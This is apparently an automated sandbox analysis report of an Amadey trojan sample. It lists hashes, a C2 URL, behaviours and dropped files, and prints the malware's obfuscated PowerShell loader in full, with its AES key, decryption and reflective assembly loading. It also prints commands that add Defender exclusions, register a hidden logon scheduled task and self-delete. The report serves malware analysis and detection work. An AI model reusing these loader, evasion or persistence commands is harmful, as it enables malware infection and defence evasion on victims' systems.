amadey | c112a2d7b7f2d1297d817b89dcdea142b4bd439bd533db9f6aa8b36d8d943d64

Analysis

max time kernel
141s
max time network
161s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
05/05/2023, 11:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

PBQB.cmd
Size

366KB
MD5

4b5e91dc56c53e6d9a765c8fda760786
SHA1

f2081c4500b6f324ab840bc1dd89370d355367ef
SHA256

c112a2d7b7f2d1297d817b89dcdea142b4bd439bd533db9f6aa8b36d8d943d64
SHA512

ef5f8186f33ce964875adac3e151b9a6f036a8ad9c86c6b017ed8185da967c1693e62135a2c59ae5737dd4d1b35aa63d805a7a84352797aeb8c7cbe55d39378b
SSDEEP

6144:ds0RP07shisP903rwOoQ2zUT540YjzcPuhLJpQyaTRBIT4uxWVqxcS4DHATSNfw3:ds0C7Yt67rd4rAPA4yaTcdfP4Tbqdsy

Score

10^/10

amadey trojan

Malware Config

Extracted

Family

amadey

Version

3.70

myserveur855.cc/8bmeVwqx/index.php

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation	rTxXs.bat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation	PBQB.cmd.exe

Executes dropped EXE 3 IoCs

pid	Process
4544	PBQB.cmd.exe
3012	rTxXs.bat.exe
2644	tjfhiwaa.ltc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000_Classes\Local Settings	PBQB.cmd.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4544	PBQB.cmd.exe
4544	PBQB.cmd.exe
4544	PBQB.cmd.exe
4544	PBQB.cmd.exe
4544	PBQB.cmd.exe
4544	PBQB.cmd.exe
4544	PBQB.cmd.exe
4544	PBQB.cmd.exe
4544	PBQB.cmd.exe
4544	PBQB.cmd.exe
4544	PBQB.cmd.exe
4544	PBQB.cmd.exe
4544	PBQB.cmd.exe
4544	PBQB.cmd.exe
4544	PBQB.cmd.exe
4544	PBQB.cmd.exe
4544	PBQB.cmd.exe
4544	PBQB.cmd.exe
4544	PBQB.cmd.exe
4544	PBQB.cmd.exe
4544	PBQB.cmd.exe
4544	PBQB.cmd.exe
4544	PBQB.cmd.exe
4544	PBQB.cmd.exe
4544	PBQB.cmd.exe
1684	powershell.exe
2416	powershell.exe
1684	powershell.exe
2416	powershell.exe
1684	powershell.exe
1684	powershell.exe
2892	powershell.exe
2892	powershell.exe
4648	powershell.exe
4648	powershell.exe
3012	rTxXs.bat.exe
3012	rTxXs.bat.exe
3012	rTxXs.bat.exe
3012	rTxXs.bat.exe
3012	rTxXs.bat.exe
3012	rTxXs.bat.exe
3012	rTxXs.bat.exe
3012	rTxXs.bat.exe
3012	rTxXs.bat.exe
3012	rTxXs.bat.exe
3012	rTxXs.bat.exe
3012	rTxXs.bat.exe
3012	rTxXs.bat.exe
3012	rTxXs.bat.exe
3012	rTxXs.bat.exe
3012	rTxXs.bat.exe
3012	rTxXs.bat.exe
3012	rTxXs.bat.exe
3012	rTxXs.bat.exe
3012	rTxXs.bat.exe
3012	rTxXs.bat.exe
3012	rTxXs.bat.exe
3012	rTxXs.bat.exe
3012	rTxXs.bat.exe
3012	rTxXs.bat.exe
4524	powershell.exe
2160	powershell.exe
2160	powershell.exe
4524	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4544	PBQB.cmd.exe
Token: SeDebugPrivilege	1684	powershell.exe
Token: SeDebugPrivilege	2416	powershell.exe
Token: SeDebugPrivilege	2892	powershell.exe
Token: SeIncreaseQuotaPrivilege	2892	powershell.exe
Token: SeSecurityPrivilege	2892	powershell.exe
Token: SeTakeOwnershipPrivilege	2892	powershell.exe
Token: SeLoadDriverPrivilege	2892	powershell.exe
Token: SeSystemProfilePrivilege	2892	powershell.exe
Token: SeSystemtimePrivilege	2892	powershell.exe
Token: SeProfSingleProcessPrivilege	2892	powershell.exe
Token: SeIncBasePriorityPrivilege	2892	powershell.exe
Token: SeCreatePagefilePrivilege	2892	powershell.exe
Token: SeBackupPrivilege	2892	powershell.exe
Token: SeRestorePrivilege	2892	powershell.exe
Token: SeShutdownPrivilege	2892	powershell.exe
Token: SeDebugPrivilege	2892	powershell.exe
Token: SeSystemEnvironmentPrivilege	2892	powershell.exe
Token: SeRemoteShutdownPrivilege	2892	powershell.exe
Token: SeUndockPrivilege	2892	powershell.exe
Token: SeManageVolumePrivilege	2892	powershell.exe
Token: 33	2892	powershell.exe
Token: 34	2892	powershell.exe
Token: 35	2892	powershell.exe
Token: 36	2892	powershell.exe
Token: SeDebugPrivilege	4648	powershell.exe
Token: SeIncreaseQuotaPrivilege	4648	powershell.exe
Token: SeSecurityPrivilege	4648	powershell.exe
Token: SeTakeOwnershipPrivilege	4648	powershell.exe
Token: SeLoadDriverPrivilege	4648	powershell.exe
Token: SeSystemProfilePrivilege	4648	powershell.exe
Token: SeSystemtimePrivilege	4648	powershell.exe
Token: SeProfSingleProcessPrivilege	4648	powershell.exe
Token: SeIncBasePriorityPrivilege	4648	powershell.exe
Token: SeCreatePagefilePrivilege	4648	powershell.exe
Token: SeBackupPrivilege	4648	powershell.exe
Token: SeRestorePrivilege	4648	powershell.exe
Token: SeShutdownPrivilege	4648	powershell.exe
Token: SeDebugPrivilege	4648	powershell.exe
Token: SeSystemEnvironmentPrivilege	4648	powershell.exe
Token: SeRemoteShutdownPrivilege	4648	powershell.exe
Token: SeUndockPrivilege	4648	powershell.exe
Token: SeManageVolumePrivilege	4648	powershell.exe
Token: 33	4648	powershell.exe
Token: 34	4648	powershell.exe
Token: 35	4648	powershell.exe
Token: 36	4648	powershell.exe
Token: SeIncreaseQuotaPrivilege	4648	powershell.exe
Token: SeSecurityPrivilege	4648	powershell.exe
Token: SeTakeOwnershipPrivilege	4648	powershell.exe
Token: SeLoadDriverPrivilege	4648	powershell.exe
Token: SeSystemProfilePrivilege	4648	powershell.exe
Token: SeSystemtimePrivilege	4648	powershell.exe
Token: SeProfSingleProcessPrivilege	4648	powershell.exe
Token: SeIncBasePriorityPrivilege	4648	powershell.exe
Token: SeCreatePagefilePrivilege	4648	powershell.exe
Token: SeBackupPrivilege	4648	powershell.exe
Token: SeRestorePrivilege	4648	powershell.exe
Token: SeShutdownPrivilege	4648	powershell.exe
Token: SeDebugPrivilege	4648	powershell.exe
Token: SeSystemEnvironmentPrivilege	4648	powershell.exe
Token: SeRemoteShutdownPrivilege	4648	powershell.exe
Token: SeUndockPrivilege	4648	powershell.exe
Token: SeManageVolumePrivilege	4648	powershell.exe

Suspicious use of WriteProcessMemory 41 IoCs

description	pid	Process	procid_target
PID 1932 wrote to memory of 3984	1932	cmd.exe	85
PID 1932 wrote to memory of 3984	1932	cmd.exe	85
PID 3984 wrote to memory of 4544	3984	cmd.exe	87
PID 3984 wrote to memory of 4544	3984	cmd.exe	87
PID 3984 wrote to memory of 4544	3984	cmd.exe	87
PID 4544 wrote to memory of 1684	4544	PBQB.cmd.exe	89
PID 4544 wrote to memory of 1684	4544	PBQB.cmd.exe	89
PID 4544 wrote to memory of 1684	4544	PBQB.cmd.exe	89
PID 4544 wrote to memory of 2416	4544	PBQB.cmd.exe	91
PID 4544 wrote to memory of 2416	4544	PBQB.cmd.exe	91
PID 4544 wrote to memory of 2416	4544	PBQB.cmd.exe	91
PID 4544 wrote to memory of 2892	4544	PBQB.cmd.exe	93
PID 4544 wrote to memory of 2892	4544	PBQB.cmd.exe	93
PID 4544 wrote to memory of 2892	4544	PBQB.cmd.exe	93
PID 4544 wrote to memory of 4648	4544	PBQB.cmd.exe	96
PID 4544 wrote to memory of 4648	4544	PBQB.cmd.exe	96
PID 4544 wrote to memory of 4648	4544	PBQB.cmd.exe	96
PID 4544 wrote to memory of 2524	4544	PBQB.cmd.exe	97
PID 4544 wrote to memory of 2524	4544	PBQB.cmd.exe	97
PID 4544 wrote to memory of 2524	4544	PBQB.cmd.exe	97
PID 2524 wrote to memory of 852	2524	WScript.exe	98
PID 2524 wrote to memory of 852	2524	WScript.exe	98
PID 2524 wrote to memory of 852	2524	WScript.exe	98
PID 852 wrote to memory of 3012	852	cmd.exe	100
PID 852 wrote to memory of 3012	852	cmd.exe	100
PID 852 wrote to memory of 3012	852	cmd.exe	100
PID 3012 wrote to memory of 4524	3012	rTxXs.bat.exe	102
PID 3012 wrote to memory of 4524	3012	rTxXs.bat.exe	102
PID 3012 wrote to memory of 4524	3012	rTxXs.bat.exe	102
PID 3012 wrote to memory of 2160	3012	rTxXs.bat.exe	103
PID 3012 wrote to memory of 2160	3012	rTxXs.bat.exe	103
PID 3012 wrote to memory of 2160	3012	rTxXs.bat.exe	103
PID 3012 wrote to memory of 3176	3012	rTxXs.bat.exe	105
PID 3012 wrote to memory of 3176	3012	rTxXs.bat.exe	105
PID 3012 wrote to memory of 3176	3012	rTxXs.bat.exe	105
PID 3012 wrote to memory of 2644	3012	rTxXs.bat.exe	109
PID 3012 wrote to memory of 2644	3012	rTxXs.bat.exe	109
PID 3012 wrote to memory of 2644	3012	rTxXs.bat.exe	109
PID 3012 wrote to memory of 3740	3012	rTxXs.bat.exe	110
PID 3012 wrote to memory of 3740	3012	rTxXs.bat.exe	110
PID 3012 wrote to memory of 3740	3012	rTxXs.bat.exe	110

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PBQB.cmd"
1⤵
- Suspicious use of WriteProcessMemory
PID:1932
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\PBQB.cmd
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3984
- - C:\Users\Admin\AppData\Local\Temp\PBQB.cmd.exe
    "C:\Users\Admin\AppData\Local\Temp\PBQB.cmd.exe" -w hidden -c $cKeS='FiGzumrGzumstGzum'.Replace('Gzum', '');$YEQK='ReGzumadLGzumineGzumsGzum'.Replace('Gzum', '');$HYrn='CGzumhaGzumngeEGzumxGzumteGzumnsGzumioGzumnGzum'.Replace('Gzum', '');$tqkz='FrGzumoGzummBGzumase6Gzum4SGzumtGzumrinGzumgGzum'.Replace('Gzum', '');$iEzw='InvGzumokeGzum'.Replace('Gzum', '');$dcHH='CGzumreGzumaGzumteGzumDGzumecGzumryGzumptGzumorGzum'.Replace('Gzum', '');$FsUE='TranGzumsfGzumormGzumFinGzumalGzumBlGzumockGzum'.Replace('Gzum', '');$vEzX='LGzumoaGzumdGzum'.Replace('Gzum', '');$duPq='MGzumainGzumMoGzumduleGzum'.Replace('Gzum', '');$Rlgx='EnGzumtrGzumyGzumPoiGzumnGzumtGzum'.Replace('Gzum', '');$zZjM='SpGzumlGzumiGzumtGzum'.Replace('Gzum', '');$NaNe='GeGzumtGzumCurGzumreGzumntGzumPrGzumocGzumessGzum'.Replace('Gzum', '');function qOKxj($LqdXv){$nYPjY=[System.Security.Cryptography.Aes]::Create();$nYPjY.Mode=[System.Security.Cryptography.CipherMode]::CBC;$nYPjY.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$nYPjY.Key=[System.Convert]::$tqkz('m6r1zR1pFEMA3f9SE7PuYXUI2auUhEBpjU0yEINKcPY=');$nYPjY.IV=[System.Convert]::$tqkz('7oOIIfAuaEyrYT+vuMQ9vA==');$CvxkF=$nYPjY.$dcHH();$libhk=$CvxkF.$FsUE($LqdXv,0,$LqdXv.Length);$CvxkF.Dispose();$nYPjY.Dispose();$libhk;}function LxFui($LqdXv){$XJLWk=New-Object System.IO.MemoryStream(,$LqdXv);$IKXcR=New-Object System.IO.MemoryStream;$zCbYq=New-Object System.IO.Compression.GZipStream($XJLWk,[IO.Compression.CompressionMode]::Decompress);$zCbYq.CopyTo($IKXcR);$zCbYq.Dispose();$XJLWk.Dispose();$IKXcR.Dispose();$IKXcR.ToArray();}$mdGgV=[System.Linq.Enumerable]::$cKeS([System.IO.File]::$YEQK([System.IO.Path]::$HYrn([System.Diagnostics.Process]::$NaNe().$duPq.FileName, $null)));$EyBOW=$mdGgV.Substring(3).$zZjM(':');$XjxKT=LxFui (qOKxj ([Convert]::$tqkz($EyBOW[0])));$NUCBP=LxFui (qOKxj ([Convert]::$tqkz($EyBOW[1])));[System.Reflection.Assembly]::$vEzX([byte[]]$NUCBP).$Rlgx.$iEzw($null,$null);[System.Reflection.Assembly]::$vEzX([byte[]]$XjxKT).$Rlgx.$iEzw($null,$null);
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4544
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(4544);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1684
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\')
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2416
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\PBQB')
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2892
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_rTxXs' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\rTxXs.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4648
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\rTxXs.vbs"
      4⤵
      Checks computer location settings
      Suspicious use of WriteProcessMemory
      PID:2524
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\rTxXs.bat" "
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:852
      - C:\Users\Admin\AppData\Roaming\rTxXs.bat.exe
        
        "C:\Users\Admin\AppData\Roaming\rTxXs.bat.exe" -w hidden -c $cKeS='FiGzumrGzumstGzum'.Replace('Gzum', '');$YEQK='ReGzumadLGzumineGzumsGzum'.Replace('Gzum', '');$HYrn='CGzumhaGzumngeEGzumxGzumteGzumnsGzumioGzumnGzum'.Replace('Gzum', '');$tqkz='FrGzumoGzummBGzumase6Gzum4SGzumtGzumrinGzumgGzum'.Replace('Gzum', '');$iEzw='InvGzumokeGzum'.Replace('Gzum', '');$dcHH='CGzumreGzumaGzumteGzumDGzumecGzumryGzumptGzumorGzum'.Replace('Gzum', '');$FsUE='TranGzumsfGzumormGzumFinGzumalGzumBlGzumockGzum'.Replace('Gzum', '');$vEzX='LGzumoaGzumdGzum'.Replace('Gzum', '');$duPq='MGzumainGzumMoGzumduleGzum'.Replace('Gzum', '');$Rlgx='EnGzumtrGzumyGzumPoiGzumnGzumtGzum'.Replace('Gzum', '');$zZjM='SpGzumlGzumiGzumtGzum'.Replace('Gzum', '');$NaNe='GeGzumtGzumCurGzumreGzumntGzumPrGzumocGzumessGzum'.Replace('Gzum', '');function qOKxj($LqdXv){$nYPjY=[System.Security.Cryptography.Aes]::Create();$nYPjY.Mode=[System.Security.Cryptography.CipherMode]::CBC;$nYPjY.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$nYPjY.Key=[System.Convert]::$tqkz('m6r1zR1pFEMA3f9SE7PuYXUI2auUhEBpjU0yEINKcPY=');$nYPjY.IV=[System.Convert]::$tqkz('7oOIIfAuaEyrYT+vuMQ9vA==');$CvxkF=$nYPjY.$dcHH();$libhk=$CvxkF.$FsUE($LqdXv,0,$LqdXv.Length);$CvxkF.Dispose();$nYPjY.Dispose();$libhk;}function LxFui($LqdXv){$XJLWk=New-Object System.IO.MemoryStream(,$LqdXv);$IKXcR=New-Object System.IO.MemoryStream;$zCbYq=New-Object System.IO.Compression.GZipStream($XJLWk,[IO.Compression.CompressionMode]::Decompress);$zCbYq.CopyTo($IKXcR);$zCbYq.Dispose();$XJLWk.Dispose();$IKXcR.Dispose();$IKXcR.ToArray();}$mdGgV=[System.Linq.Enumerable]::$cKeS([System.IO.File]::$YEQK([System.IO.Path]::$HYrn([System.Diagnostics.Process]::$NaNe().$duPq.FileName, $null)));$EyBOW=$mdGgV.Substring(3).$zZjM(':');$XjxKT=LxFui (qOKxj ([Convert]::$tqkz($EyBOW[0])));$NUCBP=LxFui (qOKxj ([Convert]::$tqkz($EyBOW[1])));[System.Reflection.Assembly]::$vEzX([byte[]]$NUCBP).$Rlgx.$iEzw($null,$null);[System.Reflection.Assembly]::$vEzX([byte[]]$XjxKT).$Rlgx.$iEzw($null,$null);
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:3012
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(3012);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4524
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\')
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2160
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\rTxXs')
        7⤵
        
        PID:3176
        
        C:\Users\Admin\AppData\Local\Temp\tjfhiwaa.ltc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\tjfhiwaa.ltc.exe"
        7⤵
        Executes dropped EXE
        
        PID:2644
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(2644);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;
        7⤵
        
        PID:3740

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
3d086a433708053f9bf9523e1d87a4e8

SHA1
b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28

SHA256
6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69

SHA512
931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
06ad34f9739c5159b4d92d702545bd49

SHA1
9152a0d4f153f3f40f7e606be75f81b582ee0c17

SHA256
474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba

SHA512
c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
35c9ac20ad85dcd26f51ed27528ffde1

SHA1
6924b8575bfced4ee98a4f15e273861837816efc

SHA256
51f168e319a7a63d14e1b7e8875f22e1b667fe1dc03a6494d354e7a74f57bbce

SHA512
cbeb6e8512e50748aa2c5823d4de41e591a7218c09ebf5b357e18404e510a44d90580b3a79811a33fa312d77275bd1bbd62ce37f5ff073d48eb192da6be297ed

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
19KB

MD5
44cc7f222079accbbebf368ef890d0fd

SHA1
383a45d7410d414177b6af533edfac592137f10c

SHA256
13a8420f208c9a616ad6bb206738fe54ebc5838321971cbd6f3b919b8042275e

SHA512
db84cf58263b3a1d22817a765d0c00e34955fd395a1001a751a445747a96d173e9f93aedecaafe1060d53f4197f57507f23e1c10df38c1c7d8c183b3d1d701f4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
17KB

MD5
bb8708883725763bf61f02821f6b3598

SHA1
97f0c35e9bb94b4c59401b2ada765cf8db5c8c8e

SHA256
3bdf8f83cf9759e3bf97c6510fce0d5429976a955589c2f0ca1f68e8e91eccd3

SHA512
f4ef0323dad3a8da1133901ba63b4a6465075bce20c62129a7190e69f37d26556cffcf09079f281eda6b53bec0c5bc625725bba4015edaf13c9df2289a020e38

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
17KB

MD5
bb8708883725763bf61f02821f6b3598

SHA1
97f0c35e9bb94b4c59401b2ada765cf8db5c8c8e

SHA256
3bdf8f83cf9759e3bf97c6510fce0d5429976a955589c2f0ca1f68e8e91eccd3

SHA512
f4ef0323dad3a8da1133901ba63b4a6465075bce20c62129a7190e69f37d26556cffcf09079f281eda6b53bec0c5bc625725bba4015edaf13c9df2289a020e38

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
15KB

MD5
b2aa5b3ccfff0819d9c57fa0d63fac63

SHA1
fa569b2fc33e37044737368211874c4674eced5f

SHA256
eae8a02d4449d2780bf24975c963a16e729e94b4091e12beef4ecfe34e0be48d

SHA512
c1aad2ec7a76aad68b09ec40218d21d20298c15214c300f30bf7e303b4fb942de8b0d0f1b4d3841cb55f1c03a48f56069141a9f0ca5846eb6fb9416f4d0e4720

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
accfaf499793ecc0a949876e085ec031

SHA1
e74f1d8cb1b238d180b513a5e54ed672dcf22fa8

SHA256
785bc2b02a07b21d52d453d1d64f098c4574b4a77f3b407cdc3804f38c75305a

SHA512
9d0fe18afb196c178e2e0d038eefa188b665386b0064d06983ec75aef69a985ffbe0971c51c8ad1fac8d3d9ae7b2410dc5f2148bcd9cb7d23dfd50ff70de34aa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
16KB

MD5
e5daa54a796b72b96f1be188b5f29485

SHA1
e33ec3ea2d59aee9e5b33f3fda6aae76c5de43a4

SHA256
5d3495bd08e2cb2aad7f014b857804dbc9741c78b5e66e428ca37edd367c2ed8

SHA512
a3a742e70b624e0a95dd28a1a78efb2031c8f1d99ed5cd6d313c4eeb39c2ad7e763039828f770ad85e22f720776a960f475dd9bc8523d9b6ff296ba61ce977dd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
16KB

MD5
e5daa54a796b72b96f1be188b5f29485

SHA1
e33ec3ea2d59aee9e5b33f3fda6aae76c5de43a4

SHA256
5d3495bd08e2cb2aad7f014b857804dbc9741c78b5e66e428ca37edd367c2ed8

SHA512
a3a742e70b624e0a95dd28a1a78efb2031c8f1d99ed5cd6d313c4eeb39c2ad7e763039828f770ad85e22f720776a960f475dd9bc8523d9b6ff296ba61ce977dd

Download Submit
C:\Users\Admin\AppData\Local\Temp\PBQB.cmd.exe

Filesize
423KB

MD5
c32ca4acfcc635ec1ea6ed8a34df5fac

SHA1
f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

SHA256
73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

SHA512
6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

Download Submit
C:\Users\Admin\AppData\Local\Temp\PBQB.cmd.exe

Filesize
423KB

MD5
c32ca4acfcc635ec1ea6ed8a34df5fac

SHA1
f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

SHA256
73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

SHA512
6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dijgymyw.kdw.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tjfhiwaa.ltc.exe

Filesize
220KB

MD5
00ecf5354e6fb6ddd33d4c3cd5e14463

SHA1
fc62cfa4c9949f32e9627fdc8f594e94662c61b5

SHA256
69526b6f69c287a4aed9846e6635471ce98723cc9f0aff839f6a22d310a61492

SHA512
df4127b62ab7ac19e1cd678c659aa8f579214e3471723dff7933287fc0f52bb5a498bcef26b8346cd11c1bbac775df34efafeff59976ecdbd8a5a8019291a40c

Download Submit
C:\Users\Admin\AppData\Local\Temp\tjfhiwaa.ltc.exe

Filesize
220KB

MD5
00ecf5354e6fb6ddd33d4c3cd5e14463

SHA1
fc62cfa4c9949f32e9627fdc8f594e94662c61b5

SHA256
69526b6f69c287a4aed9846e6635471ce98723cc9f0aff839f6a22d310a61492

SHA512
df4127b62ab7ac19e1cd678c659aa8f579214e3471723dff7933287fc0f52bb5a498bcef26b8346cd11c1bbac775df34efafeff59976ecdbd8a5a8019291a40c

Download Submit
C:\Users\Admin\AppData\Local\Temp\tjfhiwaa.ltc.exe

Filesize
220KB

MD5
00ecf5354e6fb6ddd33d4c3cd5e14463

SHA1
fc62cfa4c9949f32e9627fdc8f594e94662c61b5

SHA256
69526b6f69c287a4aed9846e6635471ce98723cc9f0aff839f6a22d310a61492

SHA512
df4127b62ab7ac19e1cd678c659aa8f579214e3471723dff7933287fc0f52bb5a498bcef26b8346cd11c1bbac775df34efafeff59976ecdbd8a5a8019291a40c

Download Submit
C:\Users\Admin\AppData\Roaming\rTxXs.bat

Filesize
366KB

MD5
4b5e91dc56c53e6d9a765c8fda760786

SHA1
f2081c4500b6f324ab840bc1dd89370d355367ef

SHA256
c112a2d7b7f2d1297d817b89dcdea142b4bd439bd533db9f6aa8b36d8d943d64

SHA512
ef5f8186f33ce964875adac3e151b9a6f036a8ad9c86c6b017ed8185da967c1693e62135a2c59ae5737dd4d1b35aa63d805a7a84352797aeb8c7cbe55d39378b

Download Submit
C:\Users\Admin\AppData\Roaming\rTxXs.bat.exe

Filesize
423KB

MD5
c32ca4acfcc635ec1ea6ed8a34df5fac

SHA1
f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

SHA256
73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

SHA512
6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

Download Submit
C:\Users\Admin\AppData\Roaming\rTxXs.bat.exe

Filesize
423KB

MD5
c32ca4acfcc635ec1ea6ed8a34df5fac

SHA1
f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

SHA256
73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

SHA512
6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

Download Submit
